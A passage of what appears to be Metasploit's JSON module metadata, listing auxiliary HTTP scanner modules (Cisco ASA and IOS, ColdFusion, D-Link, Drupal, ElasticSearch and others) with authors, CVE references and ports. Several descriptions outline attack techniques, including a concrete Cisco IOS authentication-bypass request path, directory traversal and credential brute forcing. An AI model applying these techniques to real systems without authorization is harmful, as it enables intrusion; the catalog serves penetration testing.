"description": "This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.\n It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.",
"references": [
"CVE-2018-0296",
"EDB-44956"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-28 16:48:54 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_directory_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_firepower_download": {
"name": "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
"full_name": "auxiliary/scanner/http/cisco_firepower_download",
"rank": 300,
"disclosure_date": "2016-10-10",
"type": "auxiliary",
"author": [
"Matt",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Cisco Firepower Management\n under the context of www user. Authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6435",
"URL-https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_firepower_download",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_firepower_login": {
"name": "Cisco Firepower Management Console 6.0 Login",
"full_name": "auxiliary/scanner/http/cisco_firepower_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.\n The credentials are also used for SSH, which could allow remote code execution.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_firepower_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ios_auth_bypass": {
"name": "Cisco IOS HTTP Unauthorized Administrative Access",
"full_name": "auxiliary/scanner/http/cisco_ios_auth_bypass",
"rank": 300,
"disclosure_date": "2001-06-27",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the Cisco IOS HTTP Server.\n By sending a GET request for \"/level/num/exec/..\", where num is between\n 16 and 99, it is possible to bypass authentication and obtain full system\n control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.3(11d).",
"references": [
"BID-2936",
"CVE-2001-0537",
"OSVDB-578"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ios_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ironport_enum": {
"name": "Cisco Ironport Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_ironport_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS\n versions, and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ironport_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_nac_manager_traversal": {
"name": "Cisco Network Access Manager Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/cisco_nac_manager_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nenad Stojanovski <nenad.stojanovski@gmail.com>"
],
"description": "This module tests whether a directory traversal vulnerability is present\n in versions of Cisco Network Access Manager 4.8.x. You may wish to change\n FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.",
"references": [
"CVE-2011-3305",
"OSVDB-76080"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_nac_manager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ssl_vpn": {
"name": "Cisco SSL VPN Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_ssl_vpn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module scans for Cisco SSL VPN web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-28 14:30:17 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ssl_vpn",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ssl_vpn_priv_esc": {
"name": "Cisco ASA SSL VPN Privilege Escalation Vulnerability",
"full_name": "auxiliary/scanner/http/cisco_ssl_vpn_priv_esc",
"rank": 300,
"disclosure_date": "2014-04-09",
"type": "auxiliary",
"author": [
"jclaudius <jclaudius@trustwave.com>",
"lguay <laura.r.guay@gmail.com>"
],
"description": "This module exploits a privilege escalation vulnerability for Cisco\n ASA SSL VPN (aka: WebVPN). It allows level 0 users to escalate to\n level 15.",
"references": [
"CVE-2014-2127",
"URL-http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa",
"URL-https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/clansphere_traversal": {
"name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
"full_name": "auxiliary/scanner/http/clansphere_traversal",
"rank": 300,
"disclosure_date": "2012-10-23",
"type": "auxiliary",
"author": [
"blkhtc0rp",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw found in Clansphere 2011.3.\n The application fails to handle the cs_lang parameter properly, which can be\n used to read any file outside the virtual directory.",
"references": [
"OSVDB-86720",
"EDB-22181"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/clansphere_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cnpilot_r_web_login_loot": {
"name": "Cambium cnPilot r200/r201 Login Scanner and Config Dump",
"full_name": "auxiliary/scanner/http/cnpilot_r_web_login_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cambium cnPilot r200/r201 management login\n portal(s), attempts to identify valid credentials, and dumps the device\n configuration.\n\n The device has at least two (2) users - admin and user. Due to an\n access control vulnerability, it is possible for the 'user' account to access the full\n device config. All information, including passwords and keys, is stored\n insecurely in clear-text form, thus allowing unauthorized admin access to any\n user.",
"references": [
"CVE-2017-5260",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:48:41 +0000",
"path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
"is_install_path": true,
"ref_name": "scanner/http/cnpilot_r_web_login_loot",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/coldfusion_locale_traversal": {
"name": "ColdFusion Server Check",
"full_name": "auxiliary/scanner/http/coldfusion_locale_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"nebulus"
],
"description": "This module attempts to exploit the directory traversal in the 'locale'\n attribute. According to the advisory the following versions are vulnerable:\n\n ColdFusion MX6 6.1 base patches,\n ColdFusion MX7 7,0,0,91690 base patches,\n ColdFusion MX8 8,0,1,195765 base patches,\n ColdFusion MX8 8,0,1,195765 with Hotfix4.\n\n Adobe released patches for ColdFusion 8.0, 8.0.1, and 9 but ColdFusion 9 is reported\n to have directory traversal protections in place; consequently this module does NOT\n work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or\n ColdFusion 7.\n\n It is not recommended to set FILE when doing scans across a group of servers where the OS\n may vary; otherwise, the file requested may not make sense for the OS.",
"references": [
"CVE-2010-2861",
"BID-42342",
"OSVDB-67047",
"URL-http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-18.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/coldfusion_locale_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/coldfusion_version": {
"name": "ColdFusion Version Scanner",
"full_name": "auxiliary/scanner/http/coldfusion_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to identify various flavors of ColdFusion up to version 10\n as well as the underlying OS.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/coldfusion_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/concrete5_member_list": {
"name": "Concrete5 Member List Enumeration",
"full_name": "auxiliary/scanner/http/concrete5_member_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module extracts username information from the Concrete5 member page",
"references": [
"URL-http://blog.c22.cc",
"URL-http://www.concrete5.org",
"URL-http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
"is_install_path": true,
"ref_name": "scanner/http/concrete5_member_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/copy_of_file": {
"name": "HTTP Copy File Scanner",
"full_name": "auxiliary/scanner/http/copy_of_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of possible copies\n of a specific file in a given path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/copy_of_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/crawler": {
"name": "Web Site Crawler",
"full_name": "auxiliary/scanner/http/crawler",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"tasos"
],
"description": "Crawl a web site and store information about what was found",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/crawler.rb",
"is_install_path": true,
"ref_name": "scanner/http/crawler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dell_idrac": {
"name": "Dell iDRAC Default Login",
"full_name": "auxiliary/scanner/http/dell_idrac",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cristiano Maruti <cmaruti@gmail.com>"
],
"description": "This module attempts to log in to an iDRAC webserver instance using\n the default username and password. Tested against Dell Remote Access\n Controller 6 - Express version 1.50 and 1.85",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
"is_install_path": true,
"ref_name": "scanner/http/dell_idrac",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dicoogle_traversal": {
"name": "Dicoogle PACS Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/dicoogle_traversal",
"rank": 300,
"disclosure_date": "2018-07-11",
"type": "auxiliary",
"author": [
"Carlos Avila",
"h00die"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an\n attacker to read arbitrary files with the web server privileges.\n While the application is java based, the directory traversal was only\n successful against Windows targets.",
"references": [
"EDB-45007"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-03 20:23:33 +0000",
"path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/dicoogle_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_listing": {
"name": "HTTP Directory Listing Scanner",
"full_name": "auxiliary/scanner/http/dir_listing",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies directory listing vulnerabilities\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dir_listing.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_listing",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_scanner": {
"name": "HTTP Directory Scanner",
"full_name": "auxiliary/scanner/http/dir_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting directories\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_webdav_unicode_bypass": {
"name": "MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner",
"full_name": "auxiliary/scanner/http/dir_webdav_unicode_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module is based on et's HTTP Directory Scanner module,\n with one exception. Where authentication is required, it attempts\n to bypass authentication using the WebDAV IIS6 Unicode vulnerability\n discovered by Kingcope. The vulnerability appears to be exploitable\n where WebDAV is enabled on the IIS6 server, and any protected folder\n requires either Basic, Digest or NTLM authentication.",
"references": [
"MSB-MS09-020",
"CVE-2009-1535",
"CVE-2009-1122",
"OSVDB-54555",
"BID-34993"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_webdav_unicode_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/directadmin_login": {
"name": "DirectAdmin Web Control Panel Login Utility",
"full_name": "auxiliary/scanner/http/directadmin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nick Marcoccio \"1oopho1e\" <iremembermodems@gmail.com>"
],
"description": "This module will attempt to authenticate to a DirectAdmin Web Control Panel.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2222,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-20 15:09:11 +0000",
"path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/directadmin_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_300_615_http_login": {
"name": "D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_300_615_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615\n Hardware revision D and D-Link DIR-320 devices. It is possible that this module\n also works with other models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_300_615_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_615h_http_login": {
"name": "D-Link DIR-615H HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_615h_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-615 Hardware revision H\n devices. It is possible that this module also works with other models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_615h_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_session_cgi_http_login": {
"name": "D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_session_cgi_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-300 Hardware revision B,\n D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645\n Hardware revision A devices. It is possible that this module also works with other\n models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_user_agent_backdoor": {
"name": "D-Link User-Agent Backdoor Scanner",
"full_name": "auxiliary/scanner/http/dlink_user_agent_backdoor",
"rank": 300,
"disclosure_date": "2013-10-12",
"type": "auxiliary",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module attempts to find D-Link devices running Alphanetworks web interfaces affected\n by the backdoor found on the User-Agent header. This module has been tested successfully\n on a DIR-100 device with firmware version v1.13.",
"references": [
"URL-http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_user_agent_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dnalims_file_retrieve": {
"name": "DnaLIMS Directory Traversal",
"full_name": "auxiliary/scanner/http/dnalims_file_retrieve",
"rank": 300,
"disclosure_date": "2017-03-08",
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"flakey_biscuit <nicholas@shorebreaksecurity.com>"
],
"description": "This module exploits a directory traversal vulnerability found in dnaLIMS.\n Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible\n to read a file outside the www directory.",
"references": [
"CVE-2017-6527",
"US-CERT-VU-929263",
"URL-https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
"is_install_path": true,
"ref_name": "scanner/http/dnalims_file_retrieve",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/docker_version": {
"name": "Docker Server Version Scanner",
"full_name": "auxiliary/scanner/http/docker_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agora-Security"
],
"description": "This module attempts to identify the version of a Docker Server running on a\n host. If you wish to see all the information available, set VERBOSE to true.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2375,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 02:56:47 +0000",
"path": "/modules/auxiliary/scanner/http/docker_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/docker_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dolibarr_login": {
"name": "Dolibarr ERP/CRM Login Utility",
"full_name": "auxiliary/scanner/http/dolibarr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to a Dolibarr ERP/CRM's admin web interface,\n and should only work against version 3.1.1 or older, because these versions do not\n have any default protections against brute forcing.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dolibarr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/drupal_views_user_enum": {
"name": "Drupal Views Module Users Enumeration",
"full_name": "auxiliary/scanner/http/drupal_views_user_enum",
"rank": 300,
"disclosure_date": "2010-07-02",
"type": "auxiliary",
"author": [
"Justin Klein Keane",
"Robin Francois <rof@navixia.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module exploits an information disclosure vulnerability in the 'Views'\n module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'.",
"references": [
"URL-http://www.madirish.net/node/465"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/drupal_views_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/drupal_views_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ektron_cms400net": {
"name": "Ektron CMS400.NET Default Password Scanner",
"full_name": "auxiliary/scanner/http/ektron_cms400net",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Justin Cacak"
],
"description": "Ektron CMS400.NET is a web content management system based on .NET.\n This module tests for installations that are utilizing default\n passwords set by the vendor. Additionally, it has the ability\n to brute force user accounts. Note that Ektron CMS400.NET, by\n default, enforces account lockouts for regular user accounts\n after a number of failed attempts.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
"is_install_path": true,
"ref_name": "scanner/http/ektron_cms400net",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/elasticsearch_traversal": {
"name": "ElasticSearch Snapshot API Directory Traversal",
"full_name": "auxiliary/scanner/http/elasticsearch_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Benjamin Smith",
"Pedro Andujar <pandujar@segfault.es>",
"Jose A. Guasch <jaguasch@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in\n ElasticSearch, allowing an attacker to read arbitrary files\n with JVM process privileges, through the Snapshot API.",
"references": [
"CVE-2015-5531",
"PACKETSTORM-132721"
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/elasticsearch_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
